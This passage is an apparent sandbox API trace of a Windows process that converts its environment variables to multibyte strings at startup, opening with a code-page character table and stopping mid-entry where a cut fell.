!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÕY¿e8ç\x18", lpUsedDefaultChar=0x0) returned 256 [0072.031] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0072.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4056dc [0072.075] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770da8) returned 0x80 [0072.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0072.095] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1f) returned 0x76eff8 [0072.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x76eff8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0072.103] GetLastError () returned 0x0 [0072.103] SetLastError (dwErrCode=0x0) [0072.104] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x771058 [0072.104] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771058) returned 0x4 [0072.104] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771058, Size=0x8) returned 0x771058 [0072.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0072.104] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x771068 [0072.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x771068, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0072.104] GetLastError () returned 0x0 [0072.104] SetLastError (dwErrCode=0x0) [0072.104] GetLastError () returned 0x0 [0072.104] SetLastError (dwErrCode=0x0) [0072.104] GetLastError () returned 0x0 [0072.104] SetLastError (dwErrCode=0x0) [0072.111] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771058) returned 0x8 [0072.111] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771058, Size=0xc) returned 0x7710a8 [0072.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0072.111] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x37) returned 0x7710c0 [0072.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7710c0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7710a8) returned 0xc [0072.112] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7710a8, Size=0x10) returned 0x7710a8 [0072.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0072.112] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x764fa0 [0072.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x764fa0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.112] SetLastError (dwErrCode=0x0) [0072.112] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7710a8) returned 0x10 [0072.113] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7710a8, Size=0x14) returned 0x771100 [0072.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0072.113] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x31) returned 0x771120 [0072.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x771120, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.113] GetLastError () returned 0x0 [0072.113] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771100) returned 0x14 [0072.114] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771100, Size=0x18) returned 0x771100 [0072.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.114] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x17) returned 0x771160 [0072.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x771160, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.114] SetLastError (dwErrCode=0x0) [0072.114] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771100) returned 0x18 [0072.115] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771100, Size=0x1c) returned 0x771180 [0072.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0072.115] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76a948 [0072.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x76a948, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.115] SetLastError (dwErrCode=0x0) [0072.115] GetLastError () returned 0x0 [0072.116] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771180) returned 0x1c [0072.116] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771180, Size=0x20) returned 0x771180 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0072.116] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x14) returned 0x771100 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x771100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0072.116] GetLastError () returned 0x0 [0072.116] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771180) returned 0x20 [0072.116] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771180, Size=0x24) returned 0x771180 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.116] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xd) returned 0x76e5d0 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x76e5d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0072.116] GetLastError () returned 0x0 [0072.116] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771180) returned 0x24 [0072.116] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771180, Size=0x28) returned 0x771180 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0072.116] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x25) returned 0x76a978 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x76a978, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0072.116] GetLastError () returned 0x0 [0072.116] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771180) returned 0x28 [0072.116] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771180, Size=0x2c) returned 0x771180 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0072.116] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x39) returned 0x764fe8 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x764fe8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0072.116] GetLastError () returned 0x0 [0072.116] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771180) returned 0x2c [0072.116] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771180, Size=0x30) returned 0x771180 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0072.116] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x7711b8 [0072.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7711b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0072.116] GetLastError () returned 0x0 [0072.117] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771180) returned 0x30 [0072.117] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771180, Size=0x34) returned 0x7711d8 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0072.117] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x17) returned 0x771180 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x771180, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0072.117] GetLastError () returned 0x0 [0072.117] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7711d8) returned 0x34 [0072.117] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7711d8, Size=0x38) returned 0x7711d8 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0072.117] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe) returned 0x76e5e8 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x76e5e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0072.117] GetLastError () returned 0x0 [0072.117] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7711d8) returned 0x38 [0072.117] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7711d8, Size=0x3c) returned 0x7711d8 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0072.117] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x69) returned 0x771220 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x771220, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0072.117] GetLastError () returned 0x0 [0072.117] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7711d8) returned 0x3c [0072.117] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7711d8, Size=0x40) returned 0x7711d8 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0072.117] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3e) returned 0x765030 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x765030, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0072.117] GetLastError () returned 0x0 [0072.117] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x7711d8) returned 0x40 [0072.117] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7711d8, Size=0x44) returned 0x771298 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0072.117] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1b) returned 0x76f020 [0072.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x76f020, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0072.117] GetLastError () returned 0x0 [0072.118] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x44 [0072.118] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x48) returned 0x771298 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0072.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1d) returned 0x76f048 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x76f048, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0072.118] GetLastError () returned 0x0 [0072.118] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x48 [0072.118] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x4c) returned 0x771298 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0072.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766b18 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x766b18, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0072.118] GetLastError () returned 0x0 [0072.118] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x4c [0072.118] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x50) returned 0x771298 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0072.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x12) returned 0x7711d8 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x7711d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0072.118] GetLastError () returned 0x0 [0072.118] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x50 [0072.118] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x54) returned 0x771298 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0072.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x7711f8 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x7711f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0072.118] GetLastError () returned 0x0 [0072.118] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771298) returned 0x54 [0072.118] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771298, Size=0x58) returned 0x771298 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0072.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1b) returned 0x76f070 [0072.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x76f070, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 